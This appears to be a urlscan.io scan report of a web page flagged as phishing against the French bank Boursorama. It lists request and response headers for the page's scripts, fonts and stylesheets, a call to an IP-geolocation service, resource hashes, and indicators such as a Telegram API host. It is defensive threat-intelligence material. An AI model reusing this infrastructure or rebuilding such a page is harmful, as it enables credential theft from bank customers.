date: Thu, 22 Jun 2023 17:39:36 GMT
last-modified: Tue, 20 Jun 2023 11:56:42 GMT
x-timer: S1687455576.029191,VS0,VE2
etag: "6f3f7dcbf5ca5090ee6cbb169d45a6e78b381a25297370519efc2a1958a369c0-br"
vary: x-fh-requested-host, accept-encoding
x-cache: HIT
content-type: text/javascript; charset=utf-8
cache-control: max-age=3600
accept-ranges: bytes
alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
content-length: 69843
x-cache-hits: 1

GET
H3 200 jquery.inputmask.bundle.js Show response
fr-boursorma.web.app/js/ 214 KB
32 KB 56ms
55ms Script
text/javascript 2620:0:890::100
FASTLY

General

Check archive.org

Show headers Download Go to

Full URL

https://fr-boursorma.web.app/js/jquery.inputmask.bundle.js

Requested by

Host: fr-boursorma.web.app
URL: https://fr-boursorma.web.app/login.html?xml_id=/fr_FR/Login?ID=972911073

Protocol

Security

QUIC, , AES_128_GCM

Server

2620:0:890::100 , United States, ASN54113 (FASTLY, US),

Reverse DNS

Software

Resource Hash

5cbeb9095648444ae26ad665785931d937a10bc83b78f2cf51eaefea0dc0ec21

Security Headers

Name	Value
Strict-Transport-Security	max-age=31556926; includeSubDomains; preload

Request headers

accept-language: fr-FR,fr;q=0.9
Referer: https://fr-boursorma.web.app/login.html?xml_id=/fr_FR/Login?ID=972911073
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.133 Safari/537.36

Response headers

x-served-by: cache-lcy-eglc8600050-LCY
strict-transport-security: max-age=31556926; includeSubDomains; preload
content-encoding: br
date: Thu, 22 Jun 2023 17:39:36 GMT
last-modified: Tue, 20 Jun 2023 11:56:42 GMT
x-timer: S1687455576.028638,VS0,VE5
etag: "9487e285e2fc43e7f126bb4c1f8c85e0ff3d3a62cc41e1a2b7aecadb86f9bf0b-br"
vary: x-fh-requested-host, accept-encoding
x-cache: HIT
content-type: text/javascript; charset=utf-8
cache-control: max-age=3600
accept-ranges: bytes
alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
content-length: 32114
x-cache-hits: 1

GET
H3 200 axios.min.js Show response
fr-boursorma.web.app/js/ 41 KB
10 KB 58ms
57ms Script
text/javascript 2620:0:890::100
FASTLY

General

Check archive.org

Show headers Download Go to

Full URL

https://fr-boursorma.web.app/js/axios.min.js

Requested by

Host: fr-boursorma.web.app
URL: https://fr-boursorma.web.app/login.html?xml_id=/fr_FR/Login?ID=972911073

Protocol

Security

QUIC, , AES_128_GCM

Server

2620:0:890::100 , United States, ASN54113 (FASTLY, US),

Reverse DNS

Software

Resource Hash

1a2ae249b4f343bab4ba5e4692860f863838ab6bee51a4702d3d1555d520e173

Security Headers

Name	Value
Strict-Transport-Security	max-age=31556926; includeSubDomains; preload

Request headers

accept-language: fr-FR,fr;q=0.9
Referer: https://fr-boursorma.web.app/login.html?xml_id=/fr_FR/Login?ID=972911073
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.133 Safari/537.36

Response headers

x-served-by: cache-lcy-eglc8600050-LCY
strict-transport-security: max-age=31556926; includeSubDomains; preload
content-encoding: br
date: Thu, 22 Jun 2023 17:39:36 GMT
last-modified: Tue, 20 Jun 2023 11:56:42 GMT
x-timer: S1687455576.027931,VS0,VE4
etag: "3713a3013c56a31a42b063b4ecede313139071a4d79d672f048b77f6879598ae-br"
vary: x-fh-requested-host, accept-encoding
x-cache: HIT
content-type: text/javascript; charset=utf-8
cache-control: max-age=3600
accept-ranges: bytes
alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
content-length: 10134
x-cache-hits: 1

GET
H3 200 main.js Show response
fr-boursorma.web.app/js/ 899 B
726 B 59ms
58ms Script
text/javascript 2620:0:890::100
FASTLY

General

Check archive.org

Show headers Download Go to

Full URL

https://fr-boursorma.web.app/js/main.js

Requested by

Host: fr-boursorma.web.app
URL: https://fr-boursorma.web.app/login.html?xml_id=/fr_FR/Login?ID=972911073

Protocol

Security

QUIC, , AES_128_GCM

Server

2620:0:890::100 , United States, ASN54113 (FASTLY, US),

Reverse DNS

Software

Resource Hash

cbd3d839b2c90831a6e2d2caa53ff4c02629888dac219756be2757d4d7156387

Security Headers

Name	Value
Strict-Transport-Security	max-age=31556926; includeSubDomains; preload

Request headers

accept-language: fr-FR,fr;q=0.9
Referer: https://fr-boursorma.web.app/login.html?xml_id=/fr_FR/Login?ID=972911073
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.133 Safari/537.36

Response headers

x-served-by: cache-lcy-eglc8600050-LCY
strict-transport-security: max-age=31556926; includeSubDomains; preload
content-encoding: br
date: Thu, 22 Jun 2023 17:39:36 GMT
last-modified: Tue, 20 Jun 2023 11:56:42 GMT
x-timer: S1687455576.028008,VS0,VE3
etag: "015fc58e19976dbf5a7412eee2b00e10eb6dc17bd0aed0767280c07e61551bc3-br"
vary: x-fh-requested-host, accept-encoding
x-cache: HIT
content-type: text/javascript; charset=utf-8
cache-control: max-age=3600
accept-ranges: bytes
alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
content-length: 376
x-cache-hits: 1

GET
H2 200 free.min.css Show response
ka-f.fontawesome.com/releases/v6.4.0/css/ 100 KB
23 KB 76ms
35ms Fetch
text/css 2606:4700:e6::ac40:cb1c
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL: https://ka-f.fontawesome.com/releases/v6.4.0/css/free.min.css?token=363d4a4d7b
Requested by: Host: fr-boursorma.web.app
URL: https://fr-boursorma.web.app/js/363d4a4d7b.js
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:e6::ac40:cb1c , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: fd28ebf7bdffb45da731413ed6e6940dc60123aa120bfa5a3909a40b2a2ba7e1

Request headers

accept-language: fr-FR,fr;q=0.9
Referer: https://fr-boursorma.web.app/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.133 Safari/537.36

Response headers

date: Thu, 22 Jun 2023 17:39:36 GMT
via: 1.1 e5b75c92aeb08b72d17d5fe9dd0647e0.cloudfront.net (CloudFront)
content-encoding: br
cf-cache-status: HIT
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
x-amz-cf-pop: CDG52-P2
age: 2421
x-amz-server-side-encryption: AES256
x-cache: Hit from cloudfront
alt-svc: h3=":443"; ma=86400
last-modified: Thu, 23 Mar 2023 21:29:21 GMT
server: cloudflare
etag: W/"5febfb939e2fc4ddf14fffae53b72cf0"
access-control-max-age: 3000
access-control-allow-methods: GET
content-type: text/css
access-control-allow-origin: *
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lt%2FWscgJAaIKphzsS7AK%2BqZ2Z90KHVPUJefnTI%2BvGMgQGSfIf9oD39nvadZxF3p3a9NIJ3vzrYVVnvxeXNgESS2%2FLnZSwdT%2BeMjGOSLrKT9UI1WpPptVPhl2017aXQ3C2LLkVWKMf2wuBEojnH%2FfTXtVnQ%3D%3D"}],"group":"cf-nel","max_age":604800}
cache-control: max-age=31556926
vary: Accept-Encoding
cf-ray: 7db64586fdfe0407-CDG
access-control-allow-headers: fa-kit-token
x-amz-cf-id: TCEWrzoaRXGTKHZccwDbRpyO1U8ODXvG4RKBO1Tzox6QISJbxkunUg==

GET
H2 200 free-v4-shims.min.css Show response
ka-f.fontawesome.com/releases/v6.4.0/css/ 27 KB
5 KB 70ms
30ms Fetch
text/css 2606:4700:e6::ac40:cb1c
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL: https://ka-f.fontawesome.com/releases/v6.4.0/css/free-v4-shims.min.css?token=363d4a4d7b
Requested by: Host: fr-boursorma.web.app
URL: https://fr-boursorma.web.app/js/363d4a4d7b.js
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:e6::ac40:cb1c , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: 425741cc35824b5b3b18d4135fbef6afca30662d23638366af151f7e74ba2575

Request headers

accept-language: fr-FR,fr;q=0.9
Referer: https://fr-boursorma.web.app/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.133 Safari/537.36

Response headers

date: Thu, 22 Jun 2023 17:39:36 GMT
via: 1.1 7945bb9729c0979279f468dfe8446e58.cloudfront.net (CloudFront)
content-encoding: br
cf-cache-status: HIT
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
x-amz-cf-pop: CDG52-P2
age: 2421
x-amz-server-side-encryption: AES256
x-cache: Hit from cloudfront
alt-svc: h3=":443"; ma=86400
last-modified: Thu, 23 Mar 2023 21:29:20 GMT
server: cloudflare
etag: W/"5193a6de5225940ae4ef5f7c82126be9"
access-control-max-age: 3000
access-control-allow-methods: GET
content-type: text/css
access-control-allow-origin: *
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NR84R4i4%2BAfUtNpNrL5nhk76oStcaN59NrtNPcWTEU5CUdDiokA9hlmbZvpEsDZadmjt4oyNt%2FbvKrCE2RbV2s0SgtoApiwoyWQ5h4dqs75b%2B4IyljD9a2lqSLm5MmAopIvxsJ6T%2BtJNqGoo7dUDdSaGDA%3D%3D"}],"group":"cf-nel","max_age":604800}
cache-control: max-age=31556926
vary: Accept-Encoding
cf-ray: 7db64586fe010407-CDG
access-control-allow-headers: fa-kit-token
x-amz-cf-id: QvpuhXoeVXPe18qdf1Kshp9IcA2z41q-jr46zZKQWNwmWEQXpX5StA==

GET
H2 200 free-v5-font-face.min.css Show response
ka-f.fontawesome.com/releases/v6.4.0/css/ 823 B
1 KB 68ms
28ms Fetch
text/css 2606:4700:e6::ac40:cb1c
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL: https://ka-f.fontawesome.com/releases/v6.4.0/css/free-v5-font-face.min.css?token=363d4a4d7b
Requested by: Host: fr-boursorma.web.app
URL: https://fr-boursorma.web.app/js/363d4a4d7b.js
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:e6::ac40:cb1c , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: d144babd74738640f3133de675f5fa21c7fb58bfbd430dbd967ca813403afbfd

Request headers

accept-language: fr-FR,fr;q=0.9
Referer: https://fr-boursorma.web.app/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.133 Safari/537.36

Response headers

date: Thu, 22 Jun 2023 17:39:36 GMT
via: 1.1 8c91fcc64b7a86489661ea1249599ca2.cloudfront.net (CloudFront)
content-encoding: br
cf-cache-status: HIT
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
x-amz-cf-pop: CDG52-P2
age: 2421
x-amz-server-side-encryption: AES256
x-cache: Hit from cloudfront
alt-svc: h3=":443"; ma=86400
last-modified: Thu, 23 Mar 2023 21:29:20 GMT
server: cloudflare
etag: W/"5856e3f07fbc36fc4d430a95a577a87f"
access-control-max-age: 3000
access-control-allow-methods: GET
content-type: text/css
access-control-allow-origin: *
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=20JCsEhTCjd8hguXML6nOExZs4Xn3EeMB025DWYJxx%2BEP4XIKvRvdw0RTz4ybx6ydb8G9Ez0qDmWiJQ0hBXS0gPYQ25wzR75sSHgwhdP9zOmaSV15Bc4ce6N0uU8QzANw%2BGMbIYCVqyKAB4wQLdB42Oziw%3D%3D"}],"group":"cf-nel","max_age":604800}
cache-control: max-age=31556926
vary: Accept-Encoding
cf-ray: 7db64586fe020407-CDG
access-control-allow-headers: fa-kit-token
x-amz-cf-id: EGc4sd6ERpM1jyx6bkOQfeFzgRj2-6Fc5MVZz4c5CbIr-936r-98kQ==

GET
H2 200 free-v4-font-face.min.css Show response
ka-f.fontawesome.com/releases/v6.4.0/css/ 2 KB
1 KB 69ms
29ms Fetch
text/css 2606:4700:e6::ac40:cb1c
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL: https://ka-f.fontawesome.com/releases/v6.4.0/css/free-v4-font-face.min.css?token=363d4a4d7b
Requested by: Host: fr-boursorma.web.app
URL: https://fr-boursorma.web.app/js/363d4a4d7b.js
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:e6::ac40:cb1c , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: af59041c11cf929a2d34e75e190b5da8ef037bd0fbe81a863c3bdcf430dd6b76

Request headers

accept-language: fr-FR,fr;q=0.9
Referer: https://fr-boursorma.web.app/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.133 Safari/537.36

Response headers

date: Thu, 22 Jun 2023 17:39:36 GMT
via: 1.1 1713affce12abff65dc8b74f1260c722.cloudfront.net (CloudFront)
content-encoding: br
cf-cache-status: HIT
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
x-amz-cf-pop: CDG52-P2
age: 2421
x-amz-server-side-encryption: AES256
x-cache: Hit from cloudfront
alt-svc: h3=":443"; ma=86400
last-modified: Thu, 23 Mar 2023 21:29:20 GMT
server: cloudflare
etag: W/"9e7f9f634ace089bcdacc3fcc5f23ce5"
access-control-max-age: 3000
access-control-allow-methods: GET
content-type: text/css
access-control-allow-origin: *
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SIpk9h6J3NSLkPIHjyLiRqSVlH1XOeHbmjl8SUxd5klXdJSFFygkDdRbVFzDVN0YN3Yn9BELFyx2r6r72sRddTu%2Fyn4kwRFTJtEJQ0IQMGgxVs1FWXty5X5%2BAC0aXZRsHF3xtU%2BdeiTq8yHpgYc2NmoLVA%3D%3D"}],"group":"cf-nel","max_age":604800}
cache-control: max-age=31556926
vary: Accept-Encoding
cf-ray: 7db64586fe030407-CDG
access-control-allow-headers: fa-kit-token
x-amz-cf-id: s-4PhEEt03basV2J-jP-YXN-jGCetCO4iP3gBf4u_x3JZSUROBjC_A==

GET
H/1.1 200
OK / Show response
ip-api.io/json/ 506 B
947 B 94ms
94ms XHR
application/json 192.99.71.107
OVH

General

Check archive.org

Show headers Download Go to

Full URL: https://ip-api.io/json/
Requested by: Host: fr-boursorma.web.app
URL: https://fr-boursorma.web.app/js/axios.min.js
Protocol: HTTP/1.1
Security: TLS 1.2, ECDHE_RSA, AES_128_GCM
Server: 192.99.71.107 Montreal, Canada, ASN16276 (OVH, FR),
Reverse DNS: 107.ip-192-99-71.net
Software: nginx/1.12.2 /
Resource Hash: 16e27340801dd77e3244701271c8d033ab71577d5640ee899403feda0831cff4

Request headers

Accept: application/json, text/plain, */*
Referer: https://fr-boursorma.web.app/
accept-language: fr-FR,fr;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.133 Safari/537.36

Response headers

Date: Thu, 22 Jun 2023 17:39:36 GMT
Server: nginx/1.12.2
x-ratelimit-remaining: 169
Content-Type: application/json; charset=utf-8
access-control-allow-origin: *
access-control-expose-headers
cache-control: max-age=0, private, must-revalidate
access-control-allow-credentials: true
x-ratelimit-reset: 22823
x-ratelimit-limit: 200
Connection: keep-alive
Content-Length: 506
x-request-id: F2sL5-_aXy_yXJWGsCPB

GET
H3 200 proximanova-bold-webfont-cache-1458301567.woff2
fr-boursorma.web.app/css/fonts/ 14 KB
14 KB 24ms
24ms Font
font/woff2 2620:0:890::100
FASTLY

General

Check archive.org

Show headers Download Go to

Full URL

https://fr-boursorma.web.app/css/fonts/proximanova-bold-webfont-cache-1458301567.woff2

Requested by

Host: fr-boursorma.web.app
URL: https://fr-boursorma.web.app/css/6.css

Protocol

Security

QUIC, , AES_128_GCM

Server

2620:0:890::100 , United States, ASN54113 (FASTLY, US),

Reverse DNS

Software

Resource Hash

6c57f6799cf187a6b7e7e3c188a728b416662c74b245337c4c0119eaea76efa3

Security Headers

Name	Value
Strict-Transport-Security	max-age=31556926; includeSubDomains; preload

Request headers

Referer: https://fr-boursorma.web.app/css/6.css
Origin: https://fr-boursorma.web.app
accept-language: fr-FR,fr;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.133 Safari/537.36

Response headers

x-served-by: cache-lcy-eglc8600050-LCY
strict-transport-security: max-age=31556926; includeSubDomains; preload
date: Thu, 22 Jun 2023 17:39:36 GMT
last-modified: Tue, 20 Jun 2023 11:56:42 GMT
x-timer: S1687455576.146712,VS0,VE6
etag: "6755217464e1a32fa92576cf0c5c753415782d7f7146e7da812c4492e6b5eb5a"
vary: x-fh-requested-host, accept-encoding
x-cache: HIT
content-type: font/woff2
cache-control: max-age=3600
accept-ranges: bytes
alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
content-length: 14300
x-cache-hits: 1

GET
H3 200 proximanova-regular-webfont-cache-1458301567.woff2
fr-boursorma.web.app/css/fonts/ 16 KB
16 KB 22ms
21ms Font
font/woff2 2620:0:890::100
FASTLY

General

Check archive.org

Show headers Download Go to

Full URL

https://fr-boursorma.web.app/css/fonts/proximanova-regular-webfont-cache-1458301567.woff2

Requested by

Host: fr-boursorma.web.app
URL: https://fr-boursorma.web.app/css/6.css

Protocol

Security

QUIC, , AES_128_GCM

Server

2620:0:890::100 , United States, ASN54113 (FASTLY, US),

Reverse DNS

Software

Resource Hash

e53ee2f002f94b2f0538c486bb2228daf092cd58d487a528d5c80e67e18a6f75

Security Headers

Name	Value
Strict-Transport-Security	max-age=31556926; includeSubDomains; preload

Request headers

Referer: https://fr-boursorma.web.app/css/6.css
Origin: https://fr-boursorma.web.app
accept-language: fr-FR,fr;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.133 Safari/537.36

Response headers

x-served-by: cache-lcy-eglc8600050-LCY
strict-transport-security: max-age=31556926; includeSubDomains; preload
date: Thu, 22 Jun 2023 17:39:36 GMT
last-modified: Tue, 20 Jun 2023 11:56:42 GMT
x-timer: S1687455576.148063,VS0,VE2
etag: "69f77776d2c1f3ffaf7037563192cfd7c4062680457253655c802369c826c39a"
vary: x-fh-requested-host, accept-encoding
x-cache: HIT
content-type: font/woff2
cache-control: max-age=3600
accept-ranges: bytes
alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
content-length: 16128
x-cache-hits: 1

GET
H3 200 proximanova-medium-webfont-cache-1521040380.woff2
fr-boursorma.web.app/css/fonts/ 9 KB
9 KB 23ms
22ms Font
font/woff2 2620:0:890::100
FASTLY

General

Check archive.org

Show headers Download Go to

Full URL

https://fr-boursorma.web.app/css/fonts/proximanova-medium-webfont-cache-1521040380.woff2

Requested by

Host: fr-boursorma.web.app
URL: https://fr-boursorma.web.app/css/6.css

Protocol

Security

QUIC, , AES_128_GCM

Server

2620:0:890::100 , United States, ASN54113 (FASTLY, US),

Reverse DNS

Software

Resource Hash

fc6d016af92c77df78ac5a8a607ffc1c528f105be3e5276825e90f64faa15e27

Security Headers

Name	Value
Strict-Transport-Security	max-age=31556926; includeSubDomains; preload

Request headers

Referer: https://fr-boursorma.web.app/css/6.css
Origin: https://fr-boursorma.web.app
accept-language: fr-FR,fr;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.133 Safari/537.36

Response headers

x-served-by: cache-lcy-eglc8600050-LCY
strict-transport-security: max-age=31556926; includeSubDomains; preload
date: Thu, 22 Jun 2023 17:39:36 GMT
last-modified: Tue, 20 Jun 2023 11:56:42 GMT
x-timer: S1687455576.148510,VS0,VE3
etag: "8aefe564d8d5e20552f37640ff8b831250e4c7f09343b029001e00624c048d1b"
vary: x-fh-requested-host, accept-encoding
x-cache: HIT
content-type: font/woff2
cache-control: max-age=3600
accept-ranges: bytes
alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
content-length: 9384
x-cache-hits: 1

GET
H3 200 proximanova-semibold-webfont-cache-1572260791.woff2
fr-boursorma.web.app/css/fonts/ 9 KB
9 KB 22ms
22ms Font
font/woff2 2620:0:890::100
FASTLY

General

Check archive.org

Show headers Download Go to

Full URL

https://fr-boursorma.web.app/css/fonts/proximanova-semibold-webfont-cache-1572260791.woff2

Requested by

Host: fr-boursorma.web.app
URL: https://fr-boursorma.web.app/css/6.css

Protocol

Security

QUIC, , AES_128_GCM

Server

2620:0:890::100 , United States, ASN54113 (FASTLY, US),

Reverse DNS

Software

Resource Hash

c95d1fb1d2285f81e925222f0850b22b2624f55d2aea6089597eed155d358468

Security Headers

Name	Value
Strict-Transport-Security	max-age=31556926; includeSubDomains; preload

Request headers

Referer: https://fr-boursorma.web.app/css/6.css
Origin: https://fr-boursorma.web.app
accept-language: fr-FR,fr;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.133 Safari/537.36

Response headers

x-served-by: cache-lcy-eglc8600050-LCY
strict-transport-security: max-age=31556926; includeSubDomains; preload
date: Thu, 22 Jun 2023 17:39:36 GMT
last-modified: Tue, 20 Jun 2023 11:56:42 GMT
x-timer: S1687455576.148069,VS0,VE2
etag: "21aa1508767a363aa720f850c5323115626aa1e5473cbdfdc935e4d99b7210ad"
vary: x-fh-requested-host, accept-encoding
x-cache: HIT
content-type: font/woff2
cache-control: max-age=3600
accept-ranges: bytes
alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
content-length: 9036
x-cache-hits: 1

Verdicts & Comments Add Verdict or Comment

Potentially malicious activity detected
Disclaimer: These verdicts should be used to detect potentially malicious websites, not as a final verdict!

urlscan

Phishing against: Boursorama (Banking)

11 JavaScript Global Variables

These are the non-standard "global" variables defined on the window object. These can be helpful in identifying possible client-side frameworks and code.

0 Cookies

Cookies are little pieces of information stored in the browser of a user. Whenever a user visits the site again, he will also send his cookie values, thus allowing the website to re-identify him even if he changed locations. This is how permanent logins work.

Indicators

This is a term in the security industry to describe indicators such as IPs, Domains, Hashes, etc. This does not imply that any of these indicate malicious activity.

api.telegram.org
fr-boursorma.web.app
ip-api.io
ka-f.fontawesome.com
linkbs.web.app
tinyurl.com
uptime.agencek2.com
192.99.71.107
2001:67c:4e8:f004::9
2606:4700:10::6814:8b41
2606:4700:e6::ac40:cb1c
2620:0:890::100
5.39.68.33
112ac2e3ffe928e7a1dca786498b893f07d5b4f59153b7c43d74e2d9315bdf24
16e27340801dd77e3244701271c8d033ab71577d5640ee899403feda0831cff4
1a2ae249b4f343bab4ba5e4692860f863838ab6bee51a4702d3d1555d520e173
1b4b9bc613a34d05328e493db7c257ded1560681a47f2f0e7a32d95ad8d4c47b
1d08e5a091a415aaeb621a8c6409054d0d67656553375fd27a3f2da779651097
425741cc35824b5b3b18d4135fbef6afca30662d23638366af151f7e74ba2575
44513c21e67e9a8f7bd83cef23d4fb2791ac144b0d23b4e7dfccde8c2cff550e
44ef903034ddcc9675dca414031a77ad129dd3555c58305816cb574ac106c132
5cbeb9095648444ae26ad665785931d937a10bc83b78f2cf51eaefea0dc0ec21
611282d72af9f414bbc1272c919a1336265f4dbd6f2cf78f25d70bf09d1b8b8c
6353529cb52f508fa199986854638d4dbf4648ee6ccbe9c7f4ec0fa7648e1e4b
698d247b4a8020859cb7d1ba6f1da9d345e89a619a0a890e56b69ae0d0a9015c
6c57f6799cf187a6b7e7e3c188a728b416662c74b245337c4c0119eaea76efa3
af59041c11cf929a2d34e75e190b5da8ef037bd0fbe81a863c3bdcf430dd6b76
c95d1fb1d2285f81e925222f0850b22b2624f55d2aea6089597eed155d358468
cbd3d839b2c90831a6e2d2caa53ff4c02629888dac219756be2757d4d7156387
ce0343e1d6f489768eeefe022c12181c6a0822e756239851310acf076d23d10c
d144babd74738640f3133de675f5fa21c7fb58bfbd430dbd967ca813403afbfd
d739b310b8a43bf4cda5f110d77bdfefa2123a890e1442b0270e0898f6b7f44e
e53ee2f002f94b2f0538c486bb2228daf092cd58d487a528d5c80e67e18a6f75
e59ae361b957e6ca1b5b64c375668f8c404c7de97ff9d7ef56229222d5654d99
e9a3ed3097af3491b7582893352df85155f41076c7b994d9e93f76d446793c2d
fc6d016af92c77df78ac5a8a607ffc1c528f105be3e5276825e90f64faa15e27
fd28ebf7bdffb45da731413ed6e6940dc60123aa120bfa5a3909a40b2a2ba7e1

fr-boursorma.web.app Open in urlscan Pro 2620:0:890::100 Malicious Activity! Public Scan

Summary

urlscan.io Verdict: Potentially Malicious

Domain & IP information

Screenshot Live screenshot Full Image

Page Title

Page URL History Show full URLs

Detected technologies

Page Statistics

28 Requests

96 %HTTPS

67 %IPv6

6 Domains

7 Subdomains

5 IPs

4 Countries

349 kBTransfer

2241 kBSize

0 Cookies

0 Outgoing links

Page URL History

Redirected requests

28 HTTP transactions Everything HTML Script AJAX CSS Image Expand all 0 data transactions

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Redirect headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

fr-boursorma.web.app Open in urlscan Pro
2620:0:890::100 Malicious Activity! Public Scan

Screenshot
Live screenshot

Full Image

28
Requests

96 %
HTTPS

67 %
IPv6

6
Domains

7
Subdomains

5
IPs

4
Countries

349 kB
Transfer

2241 kB
Size

0
Cookies

28 HTTP transactions
0 data transactions

Potentially malicious activity detected
Disclaimer: These verdicts should be used to detect potentially malicious websites, not as a final verdict!